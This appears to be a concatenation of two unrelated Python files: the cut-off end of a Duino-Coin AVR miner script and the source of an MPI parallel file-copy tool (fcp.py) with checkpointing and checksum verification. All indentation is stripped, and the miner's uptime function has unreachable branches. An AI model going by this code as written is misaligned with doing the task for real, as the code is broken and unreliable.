get_string('connecting_error')
+ Style.NORMAL
+ ' (main loop err: '
+ str(e)
+ ')',
'error')
debug_output('Main loop error: ' + str(e))
def periodic_report(start_time,
end_time,
shares,
hashrate,
uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" "
+ get_string('periodic_mining_report')
+ Fore.RESET
+ Style.NORMAL
+ get_string('report_period')
+ str(seconds)
+ get_string('report_time')
+ get_string('report_body1')
+ str(shares)
+ get_string('report_body2')
+ str(round(shares/seconds, 1))
+ get_string('report_body3')
+ get_string('report_body4')
+ str(int(hashrate)) + " H/s"
+ get_string('report_body5')
+ str(int(hashrate*seconds))
+ get_string('report_body6')
+ get_string('total_mining_time')
+ str(uptime), "success")
def calculate_uptime(start_time):
uptime = time() - start_time
if uptime <= 59:
return str(round(uptime)) + get_string('uptime_seconds')
elif uptime == 60:
return str(round(uptime // 60)) + get_string('uptime_minute')
elif uptime >= 60:
return str(round(uptime // 60)) + get_string('uptime_minutes')
elif uptime == 3600:
return str(round(uptime // 3600)) + get_string('uptime_hour')
elif uptime >= 3600:
return str(round(uptime // 3600)) + get_string('uptime_hours')
def fetch_pools():
while True:
pretty_print("net0",
" "
+ get_string("connection_search")
+ "...",
"warning")
try:
response = requests.get(
"https://server.duinocoin.com/getPool"
).json()
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return NODE_ADDRESS, NODE_PORT
except Exception as e:
pretty_print("net0",
" Error retrieving mining node: "
+ str(e)
+ ", retrying in 15s",
"error")
sleep(15)
if __name__ == '__main__':
if osname == "nt":
# Unicode fix for windows
ossystem("chcp 65001")
# Colorama
init(autoreset=True, convert=True)
else:
init(autoreset=True)
# Window title
title(get_string('duco_avr_miner') + str(MINER_VER) + ')')
try:
# Load config file or create new one
load_config()
debug_output('Config file loaded')
except Exception as e:
pretty_print(
'sys0',
get_string('load_config_error')
+ RESOURCES_DIR
+ get_string('load_config_error_warning')
+ Style.NORMAL
+ Fore.RESET
+ ' ('
+ str(e)
+ ')',
'error')
debug_output('Error reading configfile: ' + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
greeting()
debug_output('greeting displayed')
except Exception as e:
debug_output('Error displaying greeting message: ' + str(e))
try:
NODE_ADDRESS, NODE_PORT = fetch_pools()
except Exception as e:
print(e)
NODE_ADDRESS = "server.duinocoin.com"
NODE_PORT = 2813
debug_output("Using default server port and address")
try:
# Launch avr duco mining threads
threadid = 0
for port in avrport:
thrThread(
target=mine_avr,
args=(port, threadid)).start()
threadid += 1
except Exception as e:
debug_output('Error launching AVR thread(s): ' + str(e))
if discord_presence == "y":
try:
# Discord rich presence threads
init_rich_presence()
thrThread(
target=update_rich_presence).start()
except Exception as e:
debug_output('Error launching Discord RPC thread: ' + str(e))
|
fcp.py
|
#!/usr/bin/env python
"""
PCP provides MPI-based parallel data transfer functionality.
Author: Feiyi Wang (fwang2@ornl.gov)
"""
from __future__ import print_function, division
import time
import stat
import os
import shutil
import os.path
import hashlib
import sys
import signal
import resource
import sqlite3
import math
import cPickle as pickle
from collections import Counter
from threading import Thread
from mpi4py import MPI
import utils
from utils import bytes_fmt, destpath
from task import BaseTask
from verify import PVerify
from circle import Circle
from cio import readn, writen
from fwalk import FWalk
from checkpoint import Checkpoint
from fdef import FileChunk, ChunkSum
from globals import G
from globals import Tally as T
from dbstore import DbStore
from dbsum import MemSum
from fsum import export_checksum2
from fdef import FileItem
from _version import get_versions
from mpihelper import ThrowingArgumentParser, parse_and_bcast
from bfsignature import BFsignature
from pcircle.lru import LRU
__version__ = get_versions()['version']
del get_versions
args = None
circle = None
treewalk = None
oflimit = 0
fcp = None
num_of_hosts = 0
taskloads = []
comm = MPI.COMM_WORLD
dmsg = {"rank": "rank %s" % comm.rank}
log = utils.getLogger(__name__)
def err_and_exit(msg, code=0):
if comm.rank == 0:
print("\n%s\n" % msg)
MPI.Finalize()
sys.exit(0)
def gen_parser():
parser = ThrowingArgumentParser(description="Parallel Data Copy",
epilog="Please report issues to fwang2@ornl.gov")
parser.add_argument("--version", action="version", version="{version}".format(version=__version__))
parser.add_argument("-v", "--verbosity", action="count", help="increase verbosity")
parser.add_argument("--loglevel", default="error", help="log level, default ERROR")
parser.add_argument("--chunksize", metavar="sz", default="1m", help="chunk size (KB, MB, GB, TB), default: 1MB")
parser.add_argument("--adaptive", action="store_true", default=True, help="Adaptive chunk size")
parser.add_argument("--reduce-interval", metavar="s", type=int, default=10, help="interval, default 10s")
parser.add_argument("--no-fixopt", action="store_true", help="skip fixing ownership, permssion, timestamp")
parser.add_argument("--verify", action="store_true", help="verify after copy, default: off")
parser.add_argument("-s", "--signature", action="store_true", help="aggregate checksum for signature, default: off")
parser.add_argument("-p", "--preserve", action="store_true", help="Preserving meta, default: off")
# using bloom filter for signature genearation, all chunksums info not available at root process anymore
parser.add_argument("-o", "--output", metavar='', default="sha1-%s.sig" % utils.timestamp2(), help="sha1 output file")
parser.add_argument("-f", "--force", action="store_true", help="force overwrite")
parser.add_argument("-t", "--cptime", metavar="s", type=int, default=3600, help="checkpoint interval, default: 1hr")
parser.add_argument("-i", "--cpid", metavar="ID", default=None, help="checkpoint file id, default: timestamp")
parser.add_argument("-r", "--rid", dest="rid", metavar="ID", help="resume ID, required in resume mode")
parser.add_argument("--pause", metavar="s", type=int, help="pause a delay (seconds) after copy, test only")
parser.add_argument("--item", type=int, default=100000, help="number of items stored in memory, default: 100000")
parser.add_argument("src", nargs='+', help="copy from")
parser.add_argument("dest", help="copy to")
return parser
def sig_handler(signal, frame):
# catch keyboard, do nothing
# eprint("\tUser cancelled ... cleaning up")
sys.exit(1)
class FCP(BaseTask):
def __init__(self, circle, src, dest,
treewalk=None,
totalsize=0,
hostcnt=0,
prune=False,
verify=False,
resume=False,
workq=None):
BaseTask.__init__(self, circle)
self.circle = circle
self.treewalk = treewalk
self.totalsize = totalsize
self.prune = prune
self.workq = workq
self.resume = resume
self.checkpoint_file = None
self.checkpoint_db = None
self.src = src
self.dest = os.path.abspath(dest)
self.rfd_cache = LRU(oflimit, callback = self.cb_close_fd)
self.wfd_cache = LRU(oflimit, callback = self.cb_close_fd)
self.cnt_filesize_prior = 0
self.cnt_filesize = 0
self.blocksize = 1024 * 1024
self.chunksize = 1024 * 1024
# debug
self.d = {"rank": "rank %s" % circle.rank}
self.wtime_started = MPI.Wtime()
self.wtime_ended = None
self.workcnt = 0 # this is the cnt for the enqued items
self.reduce_items = 0 # this is the cnt for processed items
if self.treewalk:
log.debug("treewalk files = %s" % treewalk.flist, extra=self.d)
# fini_check
self.fini_cnt = Counter()
# verify
self.verify = verify
self.use_store = False
if self.verify:
self.chunksums_mem = []
self.chunksums_buf = []
# checkpointing
self.checkpoint_interval = sys.maxsize
self.checkpoint_last = MPI.Wtime()
if self.circle.rank == 0:
print("Start copying process ...")
def cb_close_fd(self, k, v):
try:
os.close(v)
except:
pass
def set_fixed_chunksize(self, sz):
self.chunksize = sz
def set_adaptive_chunksize(self, totalsz):
self.chunksize = utils.calc_chunksize(totalsz)
if self.circle.rank == 0:
print("Adaptive chunksize: %s" % bytes_fmt(self.chunksize))
def cleanup(self):
self.rfd_cache.clear()
self.wfd_cache.clear()
# remove checkpoint file
if self.checkpoint_file and os.path.exists(self.checkpoint_file):
os.remove(self.checkpoint_file)
if self.checkpoint_db and os.path.exists(self.checkpoint_db):
os.remove(self.checkpoint_db)
# remove provided checkpoint file
if G.resume and G.chk_file and os.path.exists(G.chk_file):
os.remove(G.chk_file)
if G.resume and G.chk_file_db and os.path.exists(G.chk_file_db):
os.remove(G.chk_file_db)
# remove chunksums file
if self.verify:
if hasattr(self, "chunksums_db"):
self.chunksums_db.cleanup()
# we need to do this because if last job didn't finish cleanly
# the fwalk files can be found as leftovers
# and if fcp cleanup has a chance, it should clean up that
"""
fwalk = "%s/fwalk.%s" % (G.tempdir, self.circle.rank)
if os.path.exists(fwalk):
os.remove(fwalk)
"""
def new_fchunk(self, fitem):
fchunk = FileChunk() # default cmd = copy
fchunk.src = fitem.path
fchunk.dest = destpath(fitem, self.dest)
return fchunk
def enq_file(self, fi):
""" Process a single file, represented by "fi" - FileItem
It involves chunking this file and equeue all chunks. """
chunks = fi.st_size // self.chunksize
remaining = fi.st_size % self.chunksize
workcnt = 0
if fi.st_size == 0: # empty file
fchunk = self.new_fchunk(fi)
fchunk.offset = 0
fchunk.length = 0
self.enq(fchunk)
workcnt += 1
else:
for i in range(chunks):
fchunk = self.new_fchunk(fi)
fchunk.offset = i * self.chunksize
fchunk.length = self.chunksize
self.enq(fchunk)
workcnt += chunks
if remaining > 0:
# send remainder
fchunk = self.new_fchunk(fi)
fchunk.offset = chunks * self.chunksize
fchunk.length = remaining
self.enq(fchunk)
workcnt += 1
# save work cnt
self.workcnt += workcnt
log.debug("enq_file(): %s, size = %s, workcnt = %s" % (fi.path, fi.st_size, workcnt),
extra=self.d)
def handle_fitem(self, fi):
if os.path.islink(fi.path):
dest = destpath(fi, self.dest)
linkto = os.readlink(fi.path)
try:
os.symlink(linkto, dest)
except Exception as e:
log.debug("%s, skipping sym link %s" % (e, fi.path), extra=self.d)
elif stat.S_ISREG(fi.st_mode):
self.enq_file(fi) # where chunking takes place
def create(self):
""" Each task has one create(), which is invoked by circle ONCE.
For FCP, each task will handle_fitem() -> enq_file()
to process each file gathered during the treewalk stage. """
if not G.use_store and self.workq: # restart
self.setq(self.workq)
return
if self.resume:
return
# construct and enable all copy operations
# we batch operation hard-coded
log.info("create() starts, flist length = %s" % len(self.treewalk.flist),
extra=self.d)
# flist in memory
if len(self.treewalk.flist) > 0:
for fi in self.treewalk.flist:
self.handle_fitem(fi)
# flist in buf
if len(self.treewalk.flist_buf) > 0:
for fi in self.treewalk.flist_buf:
self.handle_fitem(fi)
# flist in database
if self.treewalk.use_store:
while self.treewalk.flist_db.qsize > 0:
fitems, _ = self.treewalk.flist_db.mget(G.DB_BUFSIZE)
for fi in fitems:
self.handle_fitem(fi)
self.treewalk.flist_db.mdel(G.DB_BUFSIZE)
# both memory and databse checkpoint
if self.checkpoint_file:
self.do_no_interrupt_checkpoint()
self.checkpoint_last = MPI.Wtime()
# gather total_chunks
self.circle.comm.barrier()
G.total_chunks = self.circle.comm.allreduce(self.workcnt, op=MPI.SUM)
#G.total_chunks = self.circle.comm.bcast(G.total_chunks)
#print("Total chunks: ",G.total_chunks)
def do_open2(self, k, d, flag):
""" d is fd cache (either read or write)
open path 'k' with 'flags' """
if d.has_key(k):
return d.get(k)
fd = -1
try:
fd = os.open(k, flag)
except OSError as e:
if e.errno == 28: # no space left
log.error("Critical error: %s, exit!" % e, extra=self.d)
self.circle.exit(0) # should abort
else:
log.error("OSError({0}):{1}, skipping {2}".format(e.errno, e.strerror, k), extra=self.d)
else:
if fd > 0:
d.set(k, fd)
finally:
return fd
@staticmethod
def do_mkdir(work):
dest = work.dest
if not os.path.exists(dest):
os.makedirs(dest)
def do_copy(self, work):
src = work.src
dest = work.dest
basedir = os.path.dirname(dest)
if not os.path.exists(basedir):
os.makedirs(basedir)
rfd = self.do_open2(src, self.rfd_cache, os.O_RDONLY)
if rfd < 0:
return False
wfd = self.do_open2(dest, self.wfd_cache, os.O_WRONLY | os.O_CREAT)
if wfd < 0:
if args.force:
try:
os.unlink(dest)
except OSError as e:
log.error("Failed to unlink %s, %s " % (dest, e), extra=self.d)
return False
else:
wfd = self.do_open2(dest, self.wfd_cache, os.O_WRONLY)
else:
log.error("Failed to create output file %s" % dest, extra=self.d)
return False
# do the actual copy
self.write_bytes(rfd, wfd, work)
# update tally
self.cnt_filesize += work.length
if G.verbosity > 2:
log.debug("Transferred %s bytes from:\n\t [%s] to [%s]" %
(self.cnt_filesize, src, dest), extra=self.d)
return True
def do_no_interrupt_checkpoint(self):
a = Thread(target=self.do_checkpoint)
a.start()
a.join()
if G.verbosity > 0:
print("Checkpoint: %s" % self.checkpoint_file)
def do_checkpoint(self):
tmp_file = self.checkpoint_file + ".part"
with open(tmp_file, "wb") as f:
self.circle.workq.extend(self.circle.workq_buf)
self.circle.workq_buf.clear()
cobj = Checkpoint(self.src, self.dest, self.get_workq(), self.totalsize)
pickle.dump(cobj, f, pickle.HIGHEST_PROTOCOL)
# POSIX requires rename to be atomic
os.rename(tmp_file, self.checkpoint_file)
# copy workq_db database file
if hasattr(self.circle, "workq_db") and len(self.circle.workq_db) > 0:
self.checkpoint_db = self.checkpoint_file + ".db"
if not G.resume:
shutil.copy2(self.circle.dbname, self.checkpoint_db)
else:
# in resume mode, make a copy of current workq db file, which is provided checkpoint db file
self.workdir = os.getcwd()
existingCheckpoint = os.path.join(self.workdir,".pcp_workq.%s.%s.db" % (G.rid, self.circle.rank))
shutil.copy2(existingCheckpoint,self.checkpoint_db)
def process(self):
"""
The only work is "copy"
TODO: clean up other actions such as mkdir/fini_check
"""
if not G.use_store:
curtime = MPI.Wtime()
if curtime - self.checkpoint_last > self.checkpoint_interval:
self.do_no_interrupt_checkpoint()
log.info("Checkpointing done ...", extra=self.d)
self.checkpoint_last = curtime
work = self.deq()
self.reduce_items += 1
if isinstance(work, FileChunk):
self.do_copy(work)
else:
log.warn("Unknown work object: %s" % work, extra=self.d)
err_and_exit("Not a correct workq format")
def reduce_init(self, buf):
buf['cnt_filesize'] = self.cnt_filesize
if sys.platform == 'darwin':
buf['mem_snapshot'] = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
else:
buf['mem_snapshot'] = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * 1024
def reduce(self, buf1, buf2):
buf1['cnt_filesize'] += buf2['cnt_filesize']
buf1['mem_snapshot'] += buf2['mem_snapshot']
return buf1
def reduce_report(self, buf):
out = ""
if self.totalsize != 0:
out += "%.2f %% finished, " % (100 * float(buf['cnt_filesize']) // self.totalsize)
out += "%s copied" % bytes_fmt(buf['cnt_filesize'])
if self.circle.reduce_time_interval != 0:
rate = float(buf['cnt_filesize'] - self.cnt_filesize_prior) // self.circle.reduce_time_interval
self.cnt_filesize_prior = buf['cnt_filesize']
out += ", estimated transfer rate: %s/s" % bytes_fmt(rate)
out += ", memory usage: %s" % bytes_fmt(buf['mem_snapshot'])
print(out)
def reduce_finish(self, buf):
# self.reduce_report(buf)
pass
def epilogue(self):
global taskloads
self.wtime_ended = MPI.Wtime()
taskloads = self.circle.comm.gather(self.reduce_items)
if self.circle.rank == 0:
if self.totalsize == 0:
print("\nZero filesize detected, done.\n")
return
tlapse = self.wtime_ended - self.wtime_started
rate = float(self.totalsize) / tlapse
print("\nFCP Epilogue:\n")
print("\t{:<20}{:<20}".format("Ending at:", utils.current_time()))
print("\t{:<20}{:<20}".format("Completed in:", utils.conv_time(tlapse)))
print("\t{:<20}{:<20}".format("Transfer Rate:", "%s/s" % bytes_fmt(rate)))
print("\t{:<20}{:<20}".format("Use store chunksums:", "%s" % self.use_store))
print("\t{:<20}{:<20}".format("Use store workq:", "%s" % self.circle.use_store))
print("\t{:<20}{:<20}".format("FCP Loads:", "%s" % taskloads))
def read_then_write(self, rfd, wfd, work, num_of_bytes, m):
""" core entry point for copy action: first read then write.
@param num_of_bytes: the exact amount of bytes we will copy
@return: False if unsuccessful.
"""
buf = None
try:
buf = readn(rfd, num_of_bytes)
except IOError:
self.logger.error("Failed to read %s", work.src, extra=self.d)
return False
try:
writen(wfd, buf)
except IOError:
self.logger.error("Failed to write %s", work.dest, extra=self.d)
return False
if m:
m.update(buf)
return True
def write_bytes(self, rfd, wfd, work):
os.lseek(rfd, work.offset, os.SEEK_SET)
os.lseek(wfd, work.offset, os.SEEK_SET)
m = None
if self.verify:
m = hashlib.sha1()
remaining = work.length
while remaining != 0:
if remaining >= self.blocksize:
self.read_then_write(rfd, wfd, work, self.blocksize, m)
remaining -= self.blocksize
else:
self.read_then_write(rfd, wfd, work, remaining, m)
remaining = 0
if self.verify:
# use src path here
ck = ChunkSum(work.dest, offset=work.offset, length=work.length,
digest=m.hexdigest())
if len(self.chunksums_mem) < G.memitem_threshold:
self.chunksums_mem.append(ck)
else:
self.chunksums_buf.append(ck)
if len(self.chunksums_buf) == G.DB_BUFSIZE:
if self.use_store == False:
self.workdir = os.getcwd()
self.chunksums_dbname = "%s/chunksums.%s" % (G.tempdir, self.circle.rank)
self.chunksums_db = DbStore(dbname=self.chunksums_dbname)
self.use_store = True
self.chunksums_db.mput(self.chunksums_buf)
del self.chunksums_buf[:]
def check_dbstore_resume_condition(rid):
global circle
local_checkpoint_cnt = 0
local_dbfile_cnt = 0
db_file = "workq.%s-%s" % (rid, circle.rank)
db_full = os.path.join(".pcircle", db_file)
chk_file = "workq.%s-%s.CHECK_OK" % (rid, circle.rank)
chk_full = os.path.join(".pcircle", chk_file)
if not os.path.exists(db_full):
err_and_exit("Resume condition not met, can't locate %s" % db_file, 0)
else:
local_dbfile_cnt = 1
if not os.path.exists(chk_full):
err_and_exit("Resume condition not met, can't locate %s" % chk_file, 0)
else:
local_checkpoint_cnt = 1
total_checkpoint_cnt = circle.comm.allreduce(local_checkpoint_cnt)
total_dbfile_cnt = circle.comm.allreduce(local_dbfile_cnt)
if total_dbfile_cnt != 0 and total_checkpoint_cnt == total_dbfile_cnt:
if circle.rank == 0:
print("Resume condition ... OK\n")
else:
err_and_exit("Resume conditon not be met: mismatch db and check file", 0)
return chk_full, db_full
def check_source_and_target(isrc, idest):
""" verify and return target destination, isrc is iterable, idest is not.
"""
checked_src = []
checked_dup = set()
is_dest_exist, is_dest_dir, is_dest_file, is_dest_parent_ok = False, False, False, False
idest = os.path.abspath(idest)
if os.path.exists(idest):
if not os.access(idest, os.W_OK):
err_and_exit("Destination is not accessible", 0)
is_dest_exist = True
if os.path.isfile(idest):
is_dest_file = True
elif os.path.isdir(idest):
is_dest_dir = True
else:
# idest doesn't exits at this point
# we check if its parent exists
dest_parent = os.path.dirname(idest)
if not (os.path.exists(dest_parent) and os.access(dest_parent, os.W_OK)):
err_and_exit("Error: destination [%s] is not accessible" % dest_parent, 0)
is_dest_parent_ok = True
for ele in isrc:
elepath = os.path.abspath(ele)
elefi = FileItem(elepath)
elefi.dirname = os.path.dirname(elepath) # save dirname for proper dest construction
elebase = os.path.basename(elepath)
if elebase in checked_dup:
err_and_exit("Error: source name conflict detected: [%s]" % elepath)
checked_dup.add(elebase)
if os.path.exists(elepath) and os.access(elepath, os.R_OK):
checked_src.append(elefi)
else:
err_and_exit("Error: source [%s] doesn't exist or not accessible." % ele, 0)
if len(checked_src) == 0:
err_and_exit("Error, no valid input", 0)
elif len(checked_src) == 1 and os.path.isfile(checked_src[0].path):
if is_dest_exist:
if is_dest_file and args.force:
try:
os.remove(idest)
except OSError as e:
err_and_exit("Error: can't overwrite %s" % idest, 0)
else:
G.copytype = 'file2file'
elif is_dest_dir:
G.copytype = "file2dir"
elif is_dest_parent_ok:
G.copytype = 'file2file'
else:
err_and_exit("Error: can't detect correct copy type!", 0)
elif len(checked_src) == 1 and not is_dest_exist:
G.copytype = "dir2dir"
elif len(checked_src) == 1 and is_dest_dir:
if not args.force:
err_and_exit("Error: destination [%s] exists, will not overwrite!" % idest)
else:
G.copytype = "dir2dir"
else:
# multiple sources, destination must be directory
if not os.path.exists(idest):
err_and_exit("Error: target directory %s doesn't exist!" % idest)
if os.path.exists(idest) and os.path.isfile(idest):
err_and_exit("Error: destination [%s] is a file, directory required" % idest, 0)
# if is_dest_exist and not (args.force or args.rid):
# err_and_exit("Destination [%s] exists, will not overwrite!" % idest, 0)
G.copytype = "file2dir"
return checked_src, idest
def set_chunksize(pcp, tsz):
if args.adaptive:
pcp.set_adaptive_chunksize(tsz)
else:
pcp.set_fixed_chunksize(utils.conv_unit(args.chunksize))
def prep_recovery():
""" Prepare for checkpoint recovery, return recovered workq """
global args, circle
oldsz, tsz, sz = 0, 0, 0
sz_db = 0
cobj = None
local_checkpoint_cnt = 0
chk_file = ".pcp_workq.%s.%s" % (args.rid, circle.rank)
chk_file_db = ".pcp_workq.%s.%s.db" % (args.rid, circle.rank)
G.chk_file = chk_file
G.chk_file_db = chk_file_db
if os.path.exists(chk_file):
local_checkpoint_cnt = 1
with open(chk_file, "rb") as f:
try:
cobj = pickle.load(f)
sz = get_workq_size(cobj.workq)
src = cobj.src
dest = cobj.dest
oldsz = cobj.totalsize
except Exception as e:
log.error("error reading %s" % chk_file, extra=dmsg)
circle.comm.Abort()
if os.path.exists(chk_file_db):
qsize_db = 0
local_checkpoint_cnt = 1
conn = sqlite3.connect(chk_file_db)
cur = conn.cursor()
try:
cur.execute("SELECT * FROM checkpoint")
qsize_db, sz_db = cur.fetchone()
except sqlite3.OperationalError as e:
pass
log.debug("located chkpoint %s, sz=%s, local_cnt=%s" %
(chk_file, sz, local_checkpoint_cnt), extra=dmsg)
total_checkpoint_cnt = circle.comm.allreduce(local_checkpoint_cnt)
log.debug("total_checkpoint_cnt = %s" % total_checkpoint_cnt, extra=dmsg)
verify_checkpoint(chk_file, total_checkpoint_cnt)
# acquire total size
total_sz_mem = circle.comm.allreduce(sz)
total_sz_db = circle.comm.allreduce(sz_db)
T.total_filesize = total_sz_mem + total_sz_db
if T.total_filesize == 0:
if circle.rank == 0:
print("\nRecovery size is 0 bytes, can't proceed.")
circle.exit(0)
if circle.rank == 0:
print("\nResume copy\n")
print("\t{:<20}{:<20}".format("Original size:", bytes_fmt(oldsz)))
print("\t{:<20}{:<20}".format("Recovery size:", bytes_fmt(T.total_filesize)))
print("")
return cobj.workq
def fcp_start():
global circle, fcp, treewalk
workq = None # if fresh start, workq is None
if not args.rid: # if not in recovery
treewalk = FWalk(circle, G.src, G.dest, force=args.force)
circle.begin(treewalk)
circle.finalize()
treewalk.epilogue()
else: # okay, let's do checkpoint recovery
workq = prep_recovery()
circle = Circle(dbname="fcp")
fcp = FCP(circle, G.src, G.dest,
treewalk=treewalk,
totalsize=T.total_filesize,
verify=args.verify,
workq=workq,
hostcnt=num_of_hosts)
set_chunksize(fcp, T.total_filesize)
fcp.checkpoint_interval = args.cptime
fcp.checkpoint_file = ".pcp_workq.%s.%s" % (args.cpid, circle.rank)
circle.begin(fcp)
circle.finalize()
fcp.epilogue()
def get_workq_size(workq):
""" workq is a list of FileChunks, we iterate each and summarize the size,
which amounts to work to be done """
if workq is None:
return 0
sz = 0
for w in workq:
sz += w.length
return sz
def verify_checkpoint(chk_file, total_checkpoint_cnt):
if total_checkpoint_cnt == 0:
if circle.rank == 0:
print("")
print("Error: Can't find checkpoint file: %s" % chk_file)
print("")
circle.exit(0)
def get_oldsize(chk_file):
totalsize = 0
with open(chk_file) as f:
totalsize = int(f.read())
return totalsize
def do_fix_opt(optlist):
""" f is file/dir path """
for ele in optlist:
fi, st = ele
try:
if not stat.S_ISLNK(st.st_mode):
if G.am_root:
os.lchown(fi, st.st_uid, st.st_gid)
os.chmod(fi, st.st_mode)
except OSError as e:
log.warn("fix-opt: lchown() or chmod(): %s" % e, extra=dmsg)
def fix_opt(treewalk):
do_fix_opt(treewalk.optlist)
treewalk.opt_dir_list.sort(reverse=True)
do_fix_opt(treewalk.opt_dir_list)
#
# def store_resume(rid):
# global circle, args
#
# # check and exchange old dataset size
# oldsz = 0
# chk_file, db_file = check_resume_condition(rid)
# if circle.rank == 0:
# oldsz = get_oldsize(chk_file)
# oldsz = circle.comm.bcast(oldsz)
#
# # check and exchange recovery size
# localsz = circle.workq.fsize
# tsz = circle.comm.allreduce(localsz)
#
# if circle.rank == 0:
# print("Original size: %s" % bytes_fmt(oldsz))
# print("Recovery size: %s" % bytes_fmt(tsz))
#
# if tsz == 0:
# if circle.rank == 0:
# print("Recovery size is 0 bytes, can't proceed.")
# circle.exit(0)
#
# # src, dest probably not needed here anymore.
# src = os.path.abspath(args.src)
# dest = os.path.abspath(args.dest)
#
# # resume mode, we don't check destination path
# # dest = check_path(circle, src, dest)
# # note here that we use resume flag
# pcp = FCP(circle, src, dest, resume=True,
# totalsize=tsz, do_checksum=args.checksum,
# hostcnt=num_of_hosts)
#
# pcp.checkpoint_file = chk_file
#
# set_chunksize(pcp, tsz)
# circle.begin(pcp)
# circle.finalize(cleanup=True)
#
# return pcp, tsz
#
#
# def store_start():
# global circle, treewalk, fcp
# src = os.path.abspath(args.src)
# dest = os.path.abspath(args.dest)
# # dest = check_path(circle, src, dest)
#
# treewalk = FWalk(circle, src, dest, force=args.force)
# circle.begin(treewalk)
# treewalk.flushdb()
#
# circle.finalize(cleanup=False)
# T.total_filesize = treewalk.epilogue()
#
# fcp = FCP(circle, src, dest, treewalk=treewalk,
# totalsize=T.total_filesize, do_checksum=args.checksum, hostcnt=num_of_hosts)
# set_chunksize(fcp, T.total_filesize)
# circle.begin(fcp)
#
# # cleanup the db trails
# if treewalk:
# treewalk.cleanup()
#
# if fcp:
# fcp.cleanup()
def get_workq_name():
global args
name = None
if args.cpid:
name = "workq.%s" % args.cpid
elif args.rid:
name = "workq.%s" % args.rid[0]
else:
ts = utils.timestamp()
MPI.COMM_WORLD.bcast(ts)
name = "workq.%s" % ts
return name
def tally_hosts():
""" How many physical hosts are there?
"""
global num_of_hosts
localhost = MPI.Get_processor_name()
hosts = MPI.COMM_WORLD.gather(localhost)
if MPI.COMM_WORLD.rank == 0:
num_of_hosts = len(set(hosts))
num_of_hosts = MPI.COMM_WORLD.bcast(num_of_hosts)
def aggregate_checksums(bfsign):
signature, size, chunksums = None, None, None
if comm.rank > 0:
comm.send(bfsign.bitarray, dest=0)
else:
for p in xrange(1, comm.size):
other_bitarray = comm.recv(source=p)
bfsign.or_bf(other_bitarray)
comm.Barrier()
if comm.rank == 0:
signature = bfsign.gen_signature()
return signature
def gen_signature(bfsign, totalsize):
""" Generate a signature for dataset, it assumes the checksum
option is set and done """
if comm.rank == 0:
print("\nAggregating dataset signature ...\n")
tbegin = MPI.Wtime()
sig = aggregate_checksums(bfsign)
tend = MPI.Wtime()
if comm.rank == 0:
#print("\t{:<20}{:<20}".format("Aggregated chunks:", size))
print("\t{:<20}{:<20}".format("Running time:", utils.conv_time(tend - tbegin)))
print("\t{:<20}{:<20}".format("SHA1 Signature:", sig))
with open(args.output, "w") as f:
f.write("sha1: %s\n" % sig)
f.write("chunksize: %s\n" % fcp.chunksize)
f.write("fcp version: %s\n" % __version__)
f.write("src: %s\n" % fcp.src)
f.write("destination: %s\n" % fcp.dest)
f.write("date: %s\n" % utils.current_time())
f.write("totoalsize: %s\n" % utils.bytes_fmt(totalsize))
#print("\t{:<20}{:<20}".format("Signature File:", export_checksum2(chunksums, args.output)))
def main():
global args, log, circle, fcp, treewalk
# This might be an overkill function
signal.signal(signal.SIGINT, sig_handler)
args = parse_and_bcast(comm, gen_parser)
tally_hosts()
G.loglevel = args.loglevel
G.fix_opt = False if args.no_fixopt else True
G.preserve = args.preserve
G.resume = True if args.cpid else False
G.reduce_interval = args.reduce_interval
G.verbosity = args.verbosity
G.am_root = True if os.geteuid() == 0 else False
G.memitem_threshold = args.item
if args.signature: # with signature implies doing verify as well
args.verify = True
if args.rid:
G.resume = True
args.force = True
G.rid = args.rid
args.signature = False # when recovery, no signature
if not args.cpid:
ts = utils.timestamp()
args.cpid = MPI.COMM_WORLD.bcast(ts)
G.tempdir = os.path.join(os.getcwd(),(".pcircle" + args.cpid))
if not os.path.exists(G.tempdir):
try:
os.mkdir(G.tempdir)
except OSError:
pass
G.src, G.dest = check_source_and_target(args.src, args.dest)
dbname = get_workq_name()
circle = Circle(dbname="fwalk")
#circle.dbname = dbname
global oflimit
if num_of_hosts != 0:
max_ofile, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
procs_per_host = circle.size // num_of_hosts
oflimit = ((max_ofile - 64) // procs_per_host) // 2
if oflimit < 8:
oflimit = 8
if circle.rank == 0:
print("Running Parameters:\n")
print("\t{:<25}{:<20}".format("Starting at:", utils.current_time()))
print("\t{:<25}{:<20}".format("FCP version:", __version__))
print("\t{:<25}{:<20}".format("Source:", utils.choplist(G.src)))
print("\t{:<25}{:<20}".format("Destination:", os.path.abspath(args.dest)))
print("\t{:<25}{:<10}{:5}{:<25}{:<10}".format("Num of Hosts:", num_of_hosts, "|",
"Num of Processes:", comm.size))
print("\t{:<25}{:<10}{:5}{:<25}{:<10}".format("Overwrite:", "%r" % args.force, "|",
"Copy Verification:", "%r" % args.verify))
print("\t{:<25}{:<10}{:5}{:<25}{:<10}".format("Dataset signature:", "%r" % args.signature, "|",
"Stripe Preserve:", "%r" % G.preserve))
print("\t{:<25}{:<10}{:5}{:<25}{:<10}".format("Checkpoint interval:", "%s" % utils.conv_time(args.cptime), "|",
"Checkpoint ID:", "%s" % args.cpid))
print("\t{:<25}{:<10}{:5}{:<25}{:<10}".format("Items in memory: ",
" % r" % G.memitem_threshold, "|", "O file limit", "%s" % oflimit))
#
if args.verbosity > 0:
print("\t{:<25}{:<20}".format("Copy Mode:", G.copytype))
fcp_start()
if args.pause and args.verify:
if circle.rank == 0:
# raw_input("\n--> Press any key to continue ...\n")
print("Pause, resume after %s seconds ..." % args.pause)
sys.stdout.flush()
time.sleep(args.pause)
circle.comm.Barrier()
# do checksum verification
if args.verify:
circle = Circle(dbname="verify")
pcheck = PVerify(circle, fcp, G.total_chunks, T.total_filesize, args.signature)
circle.begin(pcheck)
circle.finalize()
tally = pcheck.fail_tally()
tally = comm.bcast(tally)
if circle.rank == 0:
print("")
if tally == 0:
print("\t{:<20}{:<20}".format("Verify result:", "PASS"))
else:
print("\t{:<20}{:<20}".format("Verify result:", "FAILED"))
comm.Barrier()
if args.signature and tally == 0:
gen_signature(pcheck.bfsign, T.total_filesize)
# fix permission
comm.Barrier()
if G.fix_opt and treewalk:
if comm.rank == 0:
print("\nFixing ownership and permissions ...")
fix_opt(treewalk)
if treewalk:
treewalk.cleanup()
if fcp:
fcp.cleanup()
#if circle:
